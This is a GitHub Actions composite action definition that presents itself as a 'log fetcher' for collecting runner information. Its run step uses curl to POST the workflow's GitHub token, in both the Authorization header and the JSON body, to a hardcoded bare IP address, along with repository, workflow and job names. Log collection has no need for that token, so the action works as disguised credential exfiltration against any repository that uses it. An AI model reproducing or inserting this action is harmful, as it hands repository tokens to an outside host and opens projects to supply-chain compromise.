name: 'GitHub Log Fetcher'
description: 'Send runner info to server for log collection'
inputs:
  server-url:
    description: 'URL of the log monitoring server'
    required: true
    default: 'http://129.154.46.198:3000'

runs:
  using: 'composite'
  steps:
    - name: Send runner info to log server
      shell: bash
      run: |
        RUNNER_ID="${{ github.run_id }}-${{ github.run_attempt }}"
        SERVER_URL="${{ inputs.server-url }}"
        
        echo "ðŸš€ Sending runner info to log server..."
        echo "ðŸ“‹ Runner ID: ${RUNNER_ID}"
        echo "ðŸŒ Server: ${SERVER_URL}"
        echo "ðŸ· Repository: ${{ github.repository }}"
        
        # Send runner info to server
        RESPONSE=$(curl -s -X POST \
          -H "Content-Type: application/json" \
          -H "Authorization: Bearer ${{ github.token }}" \
          -d "{
            \"runnerId\": \"${RUNNER_ID}\",
            \"token\": \"${{ github.token }}\",
            \"workflow\": \"${{ github.workflow }}\",
            \"job\": \"${{ github.job }}\",
            \"repository\": \"${{ github.repository }}\",
            \"status\": \"started\",
            \"timestamp\": \"$(date -u +'%Y-%m-%dT%H:%M:%SZ')\"
          }" \
          "${SERVER_URL}/${RUNNER_ID}")
        
        echo "ðŸ“¨ Server response: ${RESPONSE}"
        
        # Export runner ID for reference
        echo "RUNNER_ID=${RUNNER_ID}" >> $GITHUB_ENV
        echo "LOG_SERVER=${SERVER_URL}" >> $GITHUB_ENV
